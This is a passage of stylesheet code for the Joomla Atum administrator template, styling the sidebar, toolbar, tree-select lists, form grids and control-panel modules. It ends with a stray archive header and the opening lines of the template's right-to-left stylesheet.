  --bg-color: #f3f9f3;
  --icon-color: #55a258;
  --bg-color-hvr: var(--success);
}
.quick-icons .quickicon-info {
  display: flex;
  align-items: flex-end;
}
.quick-icons .quickicon-linkadd {
  width: 2.5rem;
  font-size: 1.2rem;
  background: hsl(var(--hue), 50%, 93%);
  transition: all 0.25s ease;
}
.quick-icons .quickicon-linkadd a {
  align-items: flex-end;
  justify-content: center;
  width: 100%;
}
.quick-icons .quickicon-linkadd a > * {
  margin-bottom: 10px;
  color: hsl(var(--hue), 30%, 40%);
}
.quick-icons .quickicon-linkadd a:hover, .quick-icons .quickicon-linkadd a:focus, .quick-icons .quickicon-linkadd a:active {
  background: var(--template-bg-dark);
}
.quick-icons .quickicon-linkadd a:hover *, .quick-icons .quickicon-linkadd a:focus *, .quick-icons .quickicon-linkadd a:active * {
  color: #fff;
}
.quick-icons .quickicon-single,
.quick-icons .quickicon-group {
  display: flex;
  min-height: 6rem;
  overflow: hidden;
  border: 1px solid hsl(var(--hue), 50%, 93%);
  border-radius: 4px;
}

#content .menu-quicktask {
  position: absolute;
}
[dir=ltr] #content .menu-quicktask {
  right: 1.25rem;
}
[dir=rtl] #content .menu-quicktask {
  left: 1.25rem;
}

#content form .name.break-word {
  word-break: break-word;
}

.sidebar-wrapper {
  z-index: 1010;
  min-height: calc(100vh - 66px);
  overflow: hidden;
  background-color: var(--template-sidebar-bg);
  box-shadow: 0 0 20px -10px var(--template-bg-dark-50);
}
.sidebar-wrapper .sidebar-sticky {
  position: sticky;
  top: 0;
}
.sidebar-wrapper .item {
  position: relative;
  display: flex;
  flex-wrap: wrap;
  list-style-type: none;
}
.sidebar-wrapper .item a,
.sidebar-wrapper .item .menu-dashboard,
.sidebar-wrapper .item .menu-quicktask {
  color: #fff;
  text-decoration: none;
}
.sidebar-wrapper .item a:hover,
.sidebar-wrapper .item .menu-dashboard:hover,
.sidebar-wrapper .item .menu-quicktask:hover {
  color: var(--template-text-light);
  text-decoration: none;
  background-color: var(--template-bg-dark-65);
}
.sidebar-wrapper .item > a {
  position: relative;
  display: flex;
  flex-grow: 1;
  align-items: center;
  min-height: 40px;
}
.sidebar-wrapper .item > a [class^=icon-],
.sidebar-wrapper .item > a [class*=" icon-"],
.sidebar-wrapper .item > a [class^=fa-],
.sidebar-wrapper .item > a [class*=" fa-"] {
  margin: 0 0.85rem;
  -webkit-transform: scale(1.2);
          transform: scale(1.2);
}
.sidebar-wrapper .item-level-2 > a {
  -webkit-padding-start: 3rem;
          padding-inline-start: 3rem;
}
.sidebar-wrapper .item-level-3 > a {
  -webkit-padding-start: 3.75rem;
          padding-inline-start: 3.75rem;
}
@media (min-width: 576px) {
  .sidebar-wrapper {
    flex: 1 0 18rem;
    max-width: 18rem;
    transition: all 0.3s ease-in-out;
  }
}
@media (max-width: 575.98px) {
  .sidebar-wrapper.sidebar-menu {
    top: auto;
  }
}
.sidebar-wrapper .sidebar-toggle {
  background: var(--template-bg-dark-60);
}
.sidebar-wrapper .sidebar-toggle a {
  color: #fff;
}
.sidebar-wrapper .sidebar-toggle .sidebar-item-title {
  white-space: nowrap;
}

.main-nav {
  width: 18rem;
  padding: 0;
  font-size: 0.95rem;
}
@media (max-width: 575.98px) {
  .main-nav {
    width: 100%;
  }
}
.main-nav li .menu-dashboard > a,
.main-nav li .menu-quicktask > a {
  display: inline-flex;
  align-items: center;
  justify-content: center;
  width: 40px;
  height: 100%;
}
.main-nav ul {
  width: 100%;
  padding: 0;
  background-color: var(--template-bg-dark-75);
}
.main-nav .divider {
  height: 1px;
  margin: 0 0 0 48px;
  list-style: none;
  background-color: var(--template-bg-dark-60);
}
.main-nav .menuitem-group {
  margin-top: 0.65rem;
  font-size: 0.75rem;
  -webkit-padding-start: 3rem;
          padding-inline-start: 3rem;
}
.main-nav .menuitem-group .sidebar-item-title {
  color: var(--template-bg-dark-30);
}
.main-nav .has-arrow .sidebar-item-title {
  -webkit-margin-end: auto;
          margin-inline-end: auto;
}
.main-nav .has-arrow::after {
  display: flex;
  align-items: center;
  justify-content: center;
  width: 2rem;
  font-family: "Font Awesome 5 Free";
  font-weight: 900;
}
[dir=ltr] .main-nav .has-arrow::after {
  content: "";
}
[dir=rtl] .main-nav .has-arrow::after {
  content: "";
}
.main-nav a.mm-active {
  background-color: var(--template-bg-dark-70);
}
.main-nav a.mm-active + .menu-quicktask {
  background-color: var(--template-bg-dark-60);
}
.main-nav .mm-active > .has-arrow::after {
  content: "";
}
.main-nav .mm-collapse {
  display: none;
}
.main-nav .mm-collapse.mm-collapsed, .main-nav .mm-collapse.mm-show {
  display: block;
}
.main-nav .mm-collapsing {
  position: relative;
  height: 0;
  overflow: hidden;
  transition: all 0.35s ease;
}
.main-nav .badge {
  align-self: center;
  margin: 0 0.3rem 0.25rem;
  background-color: var(--template-bg-dark-60);
}

.closed .sidebar-wrapper {
  flex: 1 0 3rem;
  max-width: 3rem;
  overflow: visible;
}
.closed .sidebar-item-title,
.closed .has-arrow::after,
.closed .menu-dashboard {
  display: none;
}
.closed .main-nav,
.closed .main-nav li {
  max-width: 3rem;
}
.closed .main-nav a:hover {
  position: relative;
  max-width: 3rem;
}
.closed .main-nav a:hover .sidebar-item-title {
  position: absolute;
  left: 100%;
  display: flex;
  align-items: center;
  height: 100%;
  padding: 0 1rem;
  white-space: nowrap;
  pointer-events: none;
  background-color: var(--template-bg-dark-60);
  border-radius: 0 0.25rem 0.25rem 0;
}
[dir=rtl] .closed .main-nav a:hover .sidebar-item-title {
  right: 100%;
  left: unset;
  border-radius: 0.25rem 0 0 0.25rem;
}
.closed .main-nav > li > ul {
  height: 0;
  padding: 0;
  visibility: hidden;
}

@media (min-width: 576px) {
  .toggler-burger {
    display: none;
  }
}
@media (max-width: 575.98px) {
  #menu-collapse {
    display: none;
    background: var(--template-bg-dark-50);
  }

  .toggler-burger {
    position: fixed;
    right: 0;
    bottom: 0;
    z-index: 9999;
    padding: 10px 15px;
  }
  [dir=rtl] .toggler-burger {
    right: auto;
    left: 0;
  }
  .toggler-burger:focus {
    box-shadow: none;
  }
  .toggler-burger .navbar-toggler-icon::before {
    display: inline-block;
    font: normal normal 900 28px/1 "Font Awesome 5 Free";
    color: var(--toggle-color);
    content: "";
  }
  .toggler-burger.collapsed .navbar-toggler-icon::before {
    content: "";
  }

  .sidebar-menu {
    display: none;
  }
  .sidebar-menu.show, .sidebar-menu.collapsing {
    position: fixed;
    bottom: 55px;
    z-index: 9000;
    display: block;
    width: 100%;
    min-height: auto;
    max-height: calc(100vh - 72px);
    overflow-y: auto;
  }
}
.sidebar-nav {
  padding: 1rem 2rem;
}
.sidebar-nav li {
  font-size: 0.9rem;
  font-weight: 700;
}
.sidebar-nav li.divider {
  margin: 0.3rem 0;
}
.sidebar-nav li a {
  display: block;
  padding: 0.25rem;
  font-weight: 400;
  color: var(--template-text-dark);
  text-decoration: none;
}
.sidebar-nav li a::before {
  margin-right: 0.5rem;
  font-family: "Font Awesome 5 Free";
  font-weight: 900;
  content: "";
}
[dir=rtl] .sidebar-nav li a::before {
  margin-right: 0;
  content: none;
}
[dir=rtl] .sidebar-nav li a::after {
  -webkit-margin-end: 0.5rem;
          margin-inline-end: 0.5rem;
  font-family: "Font Awesome 5 Free";
  font-weight: 900;
  content: "";
}
.sidebar-nav li.item:hover, .sidebar-nav li.active {
  background-color: var(--template-bg-dark-60);
}
.sidebar-nav li.item:hover a, .sidebar-nav li.active a {
  color: var(--template-text-light);
}

.switcher .toggle-outside {
  border: solid 1px var(--template-bg-dark-20);
  border-radius: 0.25rem;
}
.switcher .toggle-outside:focus {
  box-shadow: inset 0 0 0 0.1rem #e9e9e9;
}
.switcher input:focus ~ .toggle-outside {
  border-color: #39f;
  box-shadow: 0 0 0 0.2rem #eaeaea;
}

.disabled {
  opacity: 0.4;
}

.subhead {
  position: sticky;
  top: 0;
  right: 0;
  left: 0;
  z-index: 1000;
  width: auto;
  min-height: 43px;
  padding: 8px 1rem;
  color: var(--template-text-dark);
  background: #fff;
  background-image: linear-gradient(var(--toolbar-bg), var(--template-bg-dark-3));
  box-shadow: 0 2px 10px -8px var(--template-bg-dark-50);
}
.subhead .row {
  margin-right: 0;
  margin-left: 0;
}
.subhead.noshadow {
  box-shadow: none;
}
.subhead joomla-toolbar-button,
.subhead .btn-group {
  -webkit-margin-start: 0.75rem;
          margin-inline-start: 0.75rem;
}
.subhead joomla-toolbar-button:first-child,
.subhead .btn-group:first-child {
  -webkit-margin-start: 0;
          margin-inline-start: 0;
}
.subhead joomla-toolbar-button .btn > span,
.subhead joomla-toolbar-button .dropdown-item > span {
  -webkit-margin-end: 0.5rem;
          margin-inline-end: 0.5rem;
  width: 1.25em;
  text-align: center;
}
.subhead .btn {
  --subhead-btn-accent: var(--template-text-dark);
  padding: 0 1rem;
  margin: 5px 0;
  font-size: 1rem;
  line-height: 2.45rem;
  color: var(--template-text-dark);
  background: #fff;
  border-color: hsl(var(--hue), 20%, 80%);
}
.subhead .btn > span {
  display: inline-block;
  color: var(--subhead-btn-accent);
}
.subhead .btn:not([disabled]):hover, .subhead .btn:not([disabled]):active, .subhead .btn:not([disabled]):focus {
  color: rgba(255, 255, 255, 0.9);
  background-color: var(--subhead-btn-accent);
  border-color: var(--subhead-btn-accent);
}
.subhead .btn:not([disabled]):hover > span, .subhead .btn:not([disabled]):active > span, .subhead .btn:not([disabled]):focus > span {
  color: rgba(255, 255, 255, 0.9);
}
.subhead .btn.btn-success {
  --subhead-btn-accent: var(--success);
}
.subhead .btn.btn-danger {
  --subhead-btn-accent: var(--danger);
}
.subhead .btn.btn-primary {
  --subhead-btn-accent: var(--template-link-color);
}
.subhead .btn.btn-secondary {
  --subhead-btn-accent: var(--template-special-color);
}
.subhead .btn.btn-info {
  --subhead-btn-accent: var(--template-bg-dark);
}
.subhead .btn.btn-action {
  --subhead-btn-accent: var(--template-bg-dark);
  display: flex;
  align-items: center;
}
.subhead .btn.btn-action::after {
  width: 2.375rem;
  font-family: "Font Awesome 5 Free";
  font-weight: 900;
  content: "";
  border: 0;
}
.subhead .btn[disabled], .subhead .btn.dropdown-toggle[disabled] {
  --subhead-btn-accent: var(--template-bg-dark);
  background: rgba(222, 226, 230, 0.8);
  opacity: 0.5;
}
.subhead .btn[disabled]:hover, .subhead .btn[disabled]:active, .subhead .btn[disabled]:focus, .subhead .btn.dropdown-toggle[disabled]:hover, .subhead .btn.dropdown-toggle[disabled]:active, .subhead .btn.dropdown-toggle[disabled]:focus {
  cursor: not-allowed;
}
.subhead .dropdown-toggle.btn {
  -webkit-padding-end: 0;
          padding-inline-end: 0;
}
.subhead .btn-group:not(:last-child) > .dropdown-toggle-split {
  order: 1;
  -webkit-margin-start: -0.25rem;
          margin-inline-start: -0.25rem;
}
[dir=ltr] .subhead .btn-group:not(:last-child) > .dropdown-toggle-split {
  border-radius: 0 0.25rem 0.25rem 0;
}
[dir=rtl] .subhead .btn-group:not(:last-child) > .dropdown-toggle-split {
  border-radius: 0.25rem 0 0 0.25rem;
}
.subhead .dropdown-menu joomla-toolbar-button,
.subhead .btn-group joomla-toolbar-button {
  -webkit-margin-start: 0;
          margin-inline-start: 0;
}
.contentpane .subhead {
  margin: -15px -15px 0;
  background-image: none;
  border-bottom: 1px solid var(--template-bg-dark-7);
}

@media (max-width: 575.98px) {
  joomla-tab[view=accordion] .col-md-9,
joomla-tab[view=accordion] .col-md-3 {
    padding: 0.5rem 1rem !important;
  }

  #myTab {
    margin-top: 1rem;
    margin-bottom: 1.5rem;
  }

  joomla-tab[view=accordion] ul li {
    width: 100%;
  }

  .toggler-toolbar {
    top: 0;
    bottom: auto;
    z-index: 1030;
    padding: 7px 10px;
    margin: 5px;
    background-color: var(--template-bg-dark);
    border-radius: 30px;
  }
  .toggler-toolbar .toggler-toolbar-icon::before {
    font: normal normal 900 28px/1 "Font Awesome 5 Free";
    color: var(--toggle-color);
    content: "";
  }
  .toggler-toolbar.collapsed .toggler-toolbar-icon::before {
    content: "";
  }

  .subhead {
    padding-right: 0;
    padding-left: 0;
  }
  .subhead joomla-toolbar-button,
.subhead .btn-group,
.subhead .btn {
    width: 100%;
    margin-left: 0;
    text-align: left;
  }
  .subhead .btn-toolbar > .btn-group,
.subhead .btn-toolbar > joomla-toolbar-button {
    margin-left: 0;
  }
  .subhead .btn.btn-action::after {
    text-align: center;
    -webkit-margin-start: auto;
            margin-inline-start: auto;
  }
  .subhead .dropdown-toggle-split {
    width: auto;
  }
}
.treeselect {
  display: block;
  padding-left: 0;
  list-style: none;
}
.treeselect .nav-header {
  font-weight: 700;
  color: #212529;
}
.treeselect li {
  position: relative;
  display: block;
  line-height: 2.2rem;
  list-style: none;
}
.treeselect li::before {
  position: absolute;
  top: 14px;
  left: 25px;
  width: 10px;
  height: 1px;
  margin: auto;
  content: "";
  background-color: rgba(0, 0, 0, 0.2);
}
[dir=rtl] .treeselect li::before {
  right: 25px;
  left: 0;
  margin: 0;
}
.treeselect li::after {
  position: absolute;
  top: 0;
  bottom: 0;
  left: 25px;
  width: 1px;
  height: 100%;
  content: "";
  background-color: rgba(0, 0, 0, 0.2);
}
[dir=rtl] .treeselect li::after {
  right: 25px;
  left: 0;
}
.treeselect li:last-child::after {
  height: 14px;
}
.treeselect li li {
  -webkit-padding-start: 40px;
          padding-inline-start: 40px;
}
.treeselect > li::before,
.treeselect > li::after {
  display: none;
}
.treeselect .icon-,
.treeselect .fa- {
  display: none;
}
.treeselect .treeselect-toggle {
  display: inline-block;
  padding: 0;
  margin-right: 0.1rem;
  text-align: center;
  cursor: pointer;
}
.treeselect .treeselect-menu {
  display: inline-block;
}
.treeselect .treeselect-item {
  display: inline-block;
}
.treeselect .treeselect-item input {
  position: relative;
  top: 1px;
  margin-right: 0.2rem;
}
.treeselect .treeselect-item label {
  margin-bottom: 0;
}
.treeselect .dropdown-toggle {
  padding: 0 0.5rem 0.3rem;
  margin-left: 0.5rem;
}
.treeselect .dropdown-toggle::after {
  margin-left: 0;
  font-size: 1rem;
  color: var(--template-text-dark);
}

.treeselect-sub {
  padding-left: 0;
}

.tree-holder ul ul li::before,
.tree-holder ul ul li::after {
  left: 8px;
  display: block;
}
[dir=rtl] .tree-holder ul ul li::before,
[dir=rtl] .tree-holder ul ul li::after {
  right: 8px;
  left: 0;
  margin: 0;
}
.tree-holder ul ul li::before {
  top: 12px;
}
.tree-holder ul ul li:last-child::after {
  height: 12px;
}
.tree-holder li {
  line-height: 1.8rem;
}
.tree-holder li li {
  -webkit-padding-start: 20px;
          padding-inline-start: 20px;
}

* {
  box-sizing: border-box;
}

.element-invisible {
  position: absolute;
  width: 1px;
  height: 1px;
  padding: 0;
  overflow: hidden;
  clip: rect(0, 0, 0, 0);
  white-space: nowrap;
  border: 0;
  -webkit-clip-path: inset(50%);
          clip-path: inset(50%);
}

.hidden {
  display: none;
}

.table-row {
  display: table-row;
}

.form-grid {
  --span-1: span 1;
  --span-2: span 1;
  --span-3: span 1;
  --span-4: span 1;
  --span-5: span 1;
  display: grid;
  grid-template-columns: repeat(1, 1fr);
  grid-gap: 1rem;
}
@media (min-width: 576px) {
  .form-grid {
    --span-2: span 2;
    --span-3: span 2;
    --span-4: span 2;
    --span-5: span 2;
    grid-template-columns: repeat(2, 1fr);
  }
}
@media (min-width: 768px) {
  .form-grid {
    --span-3: span 3;
    --span-4: span 4;
    --span-5: span 4;
    grid-template-columns: repeat(4, 1fr);
    grid-gap: 1rem 2rem;
  }
}
@media (min-width: 992px) {
  .form-grid {
    --span-5: span 5;
    grid-template-columns: repeat(6, 1fr);
  }
}
.form-grid > * {
  grid-column: 1/-1;
}
.form-grid .stack {
  flex-direction: column;
}
.form-grid .span-1 {
  grid-column: 1/var(--span-1);
}
.form-grid .span-1-inline {
  grid-column: var(--span-1);
}
.form-grid .span-2 {
  grid-column: 1/var(--span-2);
}
.form-grid .span-2-inline {
  grid-column: var(--span-2);
}
.form-grid .span-3 {
  grid-column: 1/var(--span-3);
}
.form-grid .span-3-inline {
  grid-column: var(--span-3);
}
.form-grid .span-4 {
  grid-column: 1/var(--span-4);
}
.form-grid .span-4-inline {
  grid-column: var(--span-4);
}
.form-grid .span-5 {
  grid-column: 1/var(--span-5);
}
.form-grid .span-5-inline {
  grid-column: var(--span-5);
}
@media (min-width: 992px) {
  .form-grid .offset-1 {
    grid-column-start: 2;
  }
  .form-grid .offset-2 {
    grid-column-start: 3;
  }
  .form-grid .offset-3 {
    grid-column-start: 4;
  }
  .form-grid .offset-4 {
    grid-column-start: 5;
  }
  .form-grid .offset-5 {
    grid-column-start: 6;
  }
}

.w-1 {
  width: 1%;
}

.w-3 {
  width: 3%;
}

.w-5 {
  width: 5%;
}

.w-6 {
  width: 6%;
}

.w-7 {
  width: 7%;
}

.w-10 {
  width: 10%;
}

.w-12 {
  width: 12%;
}

.w-15 {
  width: 15%;
}

.w-20 {
  width: 20%;
}

.w-30 {
  width: 30%;
}

.w-35 {
  width: 35%;
}

.w-40 {
  width: 40%;
}

.w-60 {
  width: 60%;
}

.w-80 {
  width: 80%;
}

.editor-xtd-buttons .btn {
  margin-bottom: 5px;
}

.CodeMirror-fullscreen {
  top: 63px;
}

.gu-mirror {
  position: fixed !important;
  z-index: 1060 !important;
  display: table;
  margin: 0 !important;
  cursor: move;
  background-color: #20c997;
  opacity: 0.8;
}
.gu-mirror td, .gu-mirror th {
  background-color: #20c997;
}

.js-draggable .sortable-handler {
  cursor: move;
}

.editor .toggle-editor {
  margin-top: 1rem;
}
.editor .mce-tinymce {
  border: 1px solid var(--template-bg-dark);
}
.editor .mce-btn,
.editor .mce-panel {
  background: var(--white-offset);
}

.container-main .mce-panel {
  background: transparent;
  border: 0;
  box-shadow: none;
}
.container-main .mce-top-part {
  margin-bottom: 1rem;
}
.container-main .mce-top-part::before {
  box-shadow: none;
}
.container-main .mce-menubar .mce-menubtn {
  background-color: #fff;
}
.container-main .mce-flow-layout-item {
  margin: 2px 8px 2px 0;
}
.container-main .mce-btn-group:not(:first-child) {
  margin-right: 6px;
  margin-left: 0;
}
.container-main .mce-btn-group .mce-btn {
  margin: 0 1px 0 0;
}
.container-main .mce-statusbar .mce-container-body {
  background-color: #fff;
  border-top: var(--template-bg-light) 1px solid;
}

.com_config #fieldset-permissions {
  grid-template-columns: 1fr;
}
.com_config #page-filters .form-select, .com_config #page-filters .custom-select {
  width: auto;
}
.com_config .tab-description {
  grid-column: 1/-1;
}
.com_config .options-menu .revert-controls .controls {
  -webkit-margin-start: 0;
          margin-inline-start: 0;
}

.com_content.layout-edit joomla-field-media .field-media-preview {
  height: 10.25rem;
}
.com_content.layout-edit joomla-tab #attrib-basic[active],
.com_content.layout-edit joomla-tab #editor[active] {
  display: flex;
  flex-wrap: wrap;
}
.com_content.layout-edit joomla-tab #attrib-basic[active] .form-group,
.com_content.layout-edit joomla-tab #editor[active] .form-group {
  flex: 0 0 50%;
  max-width: 50%;
  box-shadow: none;
}
.com_content.layout-edit joomla-tab #attrib-basic[active] .form-group:nth-child(1), .com_content.layout-edit joomla-tab #attrib-basic[active] .form-group:nth-child(19),
.com_content.layout-edit joomla-tab #editor[active] .form-group:nth-child(1),
.com_content.layout-edit joomla-tab #editor[active] .form-group:nth-child(19) {
  flex: 0 0 100%;
  max-width: 100%;
}
.com_content.layout-edit joomla-tab #attrib-basic[active] .field-spacer,
.com_content.layout-edit joomla-tab #editor[active] .field-spacer {
  flex: 0 0 100%;
  max-width: 100%;
}

.cpanel-add-module-icon-help .list-group-item, .cpanel-add-module-icon-system .list-group-item,
.com-cpanel-help .list-group-item,
.com-cpanel-system .list-group-item {
  padding: 0;
}
.cpanel-add-module-icon-help .list-group-item a, .cpanel-add-module-icon-system .list-group-item a,
.com-cpanel-help .list-group-item a,
.com-cpanel-system .list-group-item a {
  display: block;
  padding: 0.75rem 1rem;
}
.cpanel-add-module-icon-help__header,
.com-cpanel-help__header {
  color: var(--template-special-color);
}
.cpanel-add-module-icon-help a,
.com-cpanel-help a {
  color: var(--template-link-color);
}
.cpanel-add-module-icon-help h2, .cpanel-add-module-icon-help .h2,
.com-cpanel-help h2,
.com-cpanel-help .h2 {
  font-size: 1rem;
}
.cpanel-add-module-icon-system,
.com-cpanel-system {
  -webkit-column-count: 4;
     -moz-column-count: 4;
          column-count: 4;
}
.cpanel-add-module-icon-system__category,
.com-cpanel-system__category {
  margin-bottom: 1.5em;
  page-break-inside: avoid;
  -webkit-column-break-inside: avoid;
     -moz-column-break-inside: avoid;
          break-inside: avoid;
}
.cpanel-add-module-icon-system__header,
.com-cpanel-system__header {
  color: var(--template-special-color);
}
.cpanel-add-module-icon-system__header span,
.com-cpanel-system__header span {
  margin-right: 5px;
}
.cpanel-add-module-icon-system a,
.com-cpanel-system a {
  color: var(--template-link-color);
}
.cpanel-add-module-icon-system h2, .cpanel-add-module-icon-system .h2,
.com-cpanel-system h2,
.com-cpanel-system .h2 {
  font-size: 1rem;
}
@media (max-width: 991.98px) {
  .cpanel-add-module-icon-system,
.com-cpanel-system {
    -webkit-column-count: 2;
       -moz-column-count: 2;
            column-count: 2;
  }
}
@media (max-width: 767.98px) {
  .cpanel-add-module-icon-system,
.com-cpanel-system {
    -webkit-column-count: 1;
       -moz-column-count: 1;
            column-count: 1;
  }
}

.com_cpanel .content {
  margin-top: 2rem;
}
.com_cpanel .card p:last-child {
  margin-bottom: 0;
}
.com_cpanel .card .list-group,
.com_cpanel .card .table {
  padding: 0;
  margin-bottom: unset;
}
.com_cpanel .card-header {
  display: flex;
  align-items: center;
  padding: 1rem 1rem 0.75rem;
  font-weight: 700;
  color: var(--template-bg-dark);
  background: var(--card-bg);
}
.com_cpanel .card-header > [class^=icon-],
.com_cpanel .card-header > img {
  -webkit-margin-end: 0.5rem;
          margin-inline-end: 0.5rem;
}
.com_cpanel .card-header .btn {
  margin-top: 0.25em;
  margin-bottom: 0.25em;
}
.com_cpanel .card-body {
  padding: 0;
  overflow: hidden;
  border-bottom-right-radius: 0.25rem;
  border-bottom-left-radius: 0.25rem;
}
.com_cpanel .module-actions {
  order: 1;
  -webkit-margin-start: auto;
          margin-inline-start: auto;
}
.com_cpanel .module-actions > * {
  padding: 0;
  color: var(--template-bg-dark-70);
}
.com_cpanel .cpanel-add-module {
  display: flex;
  flex-direction: column;
  align-items: flex-start;
  justify-content: flex-end;
  width: 100%;
  min-height: 130px;
  padding: 0 1rem;
  font-size: 0.875rem;
  font-weight: 700;
  line-height: 1;
  color: hsl(var(--hue), 30%, 40%);
  background-color: hsl(var(--hue), 35%, 98%);
  border: 1px solid hsl(var(--hue), 35%, 88%);
  border-radius: 0.25rem;
  transition: all 0.15s ease-in;
}
.com_cpanel .cpanel-add-module:hover, .com_cpanel .cpanel-add-module:focus, .com_cpanel .cpanel-add-module:active {
  color: #fff;
  text-decoration: none;
  background: var(--template-bg-dark);
}
.com_cpanel .cpanel-add-module > span {
  padding: 0.25rem 0 1rem;
}
.com_cpanel .cpanel-add-module .cpanel-add-module-icon {
  font-size: 2rem;
  color: hsl(var(--hue), 30%, 40%);
  -webkit-margin-end: 0.5rem;
          margin-inline-end: 0.5rem;
}

.cpanel-modules .list-group {
  border-top: 1px solid hsl(var(--hue), 40%, 85%);
}
.cpanel-modules .list-group-item:hover {
  background: var(--toolbar-bg);
}
.cpanel-modules .list-group-item a {
  font-weight: 500;
  text-decoration: underline;
}
.cpanel-modules .list-group-item .btn {
  text-decoration: none;
}
.cpanel-modules .list-group-item .list-group-item a > span[class^=icon-], .cpanel-modules .list-group-item .list-group-item a > span[class*=" icon-"], .cpanel-modules .list-group-item .list-group-item a > span[class^=fa-], .cpanel-modules .list-group-item .list-group-item a > span[class*=" fa-"] {
  display: block;
  padding: 0.5rem;
  color: rgba(255, 255, 255, 0.9);
  background: var(--template-link-color);
  box-shadow: 0 2px 10px -8px var(--template-bg-dark-50);
}
.cpanel-modules .list-group-item .list-group-item a > span[class^=icon-]:hover, .cpanel-modules .list-group-item .list-group-item a > span[class*=" icon-"]:hover, .cpanel-modules .list-group-item .list-group-item a > span[class^=fa-]:hover, .cpanel-modules .list-group-item .list-group-item a > span[class*=" fa-"]:hover {
  background: var(--template-link-hover-color);
}
.cpanel-modules .list-group-item span.home-image[class^=icon-], .cpanel-modules .list-group-item span.home-image[class*=" icon-"], .cpanel-modules .list-group-item span.home-image[class^=fa-], .cpanel-modules .list-group-item span.home-image[class*=" fa-"] {
  display: inline-block;
  padding: 0;
  margin: 0 0.85rem;
  font-size: 0.9rem;
  color: #010101;
  background: var(--white-offset);
  box-shadow: none;
  -webkit-transform: scale(1.2);
          transform: scale(1.2);
}
.cpanel-modules h2, .cpanel-modules .h2 {
  margin-bottom: 0;
  font-size: 1rem;
}
.cpanel-modules .mod-custom {
  padding: 1rem;
}

.sample-data .list-group-item {
  padding: 1rem;
}

.sample-data__title {
  font-weight: bold;
  color: var(--primary);
}

.sample-data__icon {
  width: 1.3rem;
  text-align: center;
}

.sample-data__desc {
  -webkit-border-start: 4px solid hsl(var(--hue), 50%, 93%);
          border-inline-start: 4px solid hsl(var(--hue), 50%, 93%);
  -webkit-padding-start: 1rem;
          padding-inline-start: 1rem;
  -webkit-margin-start: 8px;
          margin-inline-start: 8px;
}

.com_joomlaupdate caption {
  caption-side: top;
}

.new-modules .card-columns {
  grid-template-columns: repeat(auto-fill, minmax(240px, 1fr));
}

.new-module {
  display: flex;
  overflow: hidden;
  color: hsl(var(--hue), 30%, 40%);
  background-color: hsl(var(--hue), 60%, 97%);
  border: 1px solid hsl(var(--hue), 50%, 93%);
  border-radius: 0.25rem;
}
.new-module * {
  transition: all 0.25s ease;
}
.new-module-details {
  flex: 1 0;
  padding: 1rem;
}
.new-module-title {
  margin-bottom: 0.25rem;
  font-size: 1rem;
  font-weight: 700;
}
.new-module-caption {
  display: box;
  margin: 0;
  overflow: hidden;
  font-size: 0.875rem;
  /* stylelint-disable property-no-unknown */
  box-orient: vertical;
  -webkit-line-clamp: 3;
}
.new-module-link {
  display: flex;
  align-items: flex-end;
  justify-content: center;
  width: 2.5rem;
  font-size: 1.2rem;
  background: hsl(var(--hue), 50%, 93%);
}
.new-module-link span {
  margin-bottom: 10px;
  color: hsl(var(--hue), 30%, 40%);
}
.new-module:hover .new-module-link {
  background: var(--template-bg-dark);
}
.new-module:hover .new-module-link span {
  color: #fff;
}

.com_tags #fieldset-image-intro > div,
.com_tags #fieldset-image-fulltext > div {
  grid-template-columns: 1fr;
}
@media (min-width: 768px) {
  .com_tags #fieldset-image-intro,
.com_tags #fieldset-image-fulltext {
    display: inline-block;
    width: calc(50% - 15px);
  }
}
.com_tags #fieldset-image-intro {
  -webkit-margin-end: 15px;
          margin-inline-end: 15px;
}
.com_tags #fieldset-image-fulltext {
  -webkit-margin-start: 15px;
          margin-inline-start: 15px;
}

.tbody-icon .icon-download,
.tbody-icon .fa-download {
  color: var(--success);
  border-color: var(--success);
}
.tbody-icon .icon-mail,
.tbody-icon .fa-mail {
  color: var(--primary);
  border-color: var(--primary);
}
.tbody-icon .icon-delete,
.tbody-icon .fa-delete,
.tbody-icon .icon-times,
.tbody-icon .fa-times {
  color: var(--danger);
  border-color: var(--danger);
}

.com_templates .menu-assignment {
  position: relative;
}
.com_templates .menu-assignment .menu-links {
  padding-left: 0;
  margin-top: 15px;
  margin-left: 0;
  -webkit-column-count: 3;
     -moz-column-count: 3;
          column-count: 3;
  -webkit-column-gap: 15px;
     -moz-column-gap: 15px;
          column-gap: 15px;
}
@media (max-width: 991.98px) {
  .com_templates .menu-assignment .menu-links {
    -webkit-column-count: auto;
       -moz-column-count: auto;
            column-count: auto;
  }
}
.com_templates .menu-assignment .menu-links > li {
  display: inline-block;
  width: 100%;
  margin-bottom: 15px;
  vertical-align: top;
  list-style: none;
  -webkit-backface-visibility: hidden;
          backface-visibility: hidden;
  page-break-inside: avoid;
  -webkit-column-break-inside: avoid;
     -moz-column-break-inside: avoid;
          break-inside: avoid;
}
.com_templates .menu-assignment .menu-links-block {
  padding: 15px;
  background-color: var(--card-bg);
  border: 1px solid #dee2e6;
  border-radius: 3px;
}
.com_templates .menu-assignment label {
  display: block;
  padding: 3px 0;
  font-size: inherit;
}
.com_templates .menu-assignment label input {
  position: relative;
  -webkit-margin-end: 5px;
          margin-inline-end: 5px;
}

.com_users.view-debuggroup thead th, .com_users.view-debuguser thead th {
  white-space: normal;
}
.com_users.view-debuggroup .legend, .com_users.view-debuguser .legend {
  margin: 1rem 1rem 0;
}
.com_users.view-mail .form-control {
  max-width: 100%;
}
.com_users #fieldset-groups .controls {
  -webkit-margin-start: 2rem;
          margin-inline-start: 2rem;
}

@media (prefers-reduced-motion: reduce) {
  *, ::before, ::after {
    background-attachment: initial !important;
    transition-delay: 0s !important;
    transition-duration: 0.001ms !important;
    -webkit-animation-duration: 1ms !important;
            animation-duration: 1ms !important;
    -webkit-animation-delay: -1ms !important;
            animation-delay: -1ms !important;
    -webkit-animation-iteration-count: 1 !important;
            animation-iteration-count: 1 !important;
    scroll-behavior: auto !important;
  }
}PK!��<VdVdatum/css/template-rtl.cssnu&1i�@charset "UTF-8";
:root {
  --card-bg: rgba(255, 255, 255, 0.7);
  --bluegray: #b2bfcd;
  --lightbluegray: #f6f9fc;
  --toolbar-bg: #fff;
  --success-border: var(--success);
  --info-border: var(--info);
  --warning-border: var(--warning);
  --danger-border: var(--danger);
  --login-main-bg: #0b1c32;
  --border: #cdcdcd;
  --white: #fff;
  --white-offset: #fefefe;
  --focus: #39f;
  --focus-shadow: 0 0 0 0.2rem #eaeaea;
  --toggle-color: #fff;
  --template-sidebar-bg: var(--template-bg-dark-80);
  --template-sidebar-font-color: #fff;
  --template-sidebar-link-color: #fff;
  --template-bg-light: #f0f4fb;
